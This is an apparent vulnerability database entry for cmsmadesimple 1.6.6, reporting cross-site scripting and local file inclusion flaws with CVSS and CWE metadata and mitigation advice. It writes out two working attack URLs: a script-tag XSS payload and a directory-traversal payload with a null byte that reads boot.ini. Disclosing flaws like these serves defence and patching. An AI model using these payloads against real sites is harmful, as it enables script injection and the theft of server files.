vendor:
cmsmadesimple
by:
Beenu Arora
7,5
CVSS
HIGH
XSS and Local File Inclusion
79 (XSS) and 22 (Local File Inclusion)
CWE
Product Name: cmsmadesimple
Affected Version From: 1.6.6
Affected Version To: 1.6.6
Patch Exists: YES
Related CWE: N/A
CPE: a:cmsmadesimple:cmsmadesimple
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2007
Multiple Vulnerablities in cmsmadesimple
Multiple vulnerabilities exist in cmsmadesimple, including XSS and Local File Inclusion. XSS can be exploited by sending a malicious URL to the victim, such as http://localhost/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>. Local File Inclusion can be exploited by sending a malicious URL to the victim, such as http://server/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39
Mitigation:
Ensure that user input is properly sanitized and validated before being used in the application. Also, ensure that the application is running the latest version of cmsmadesimple.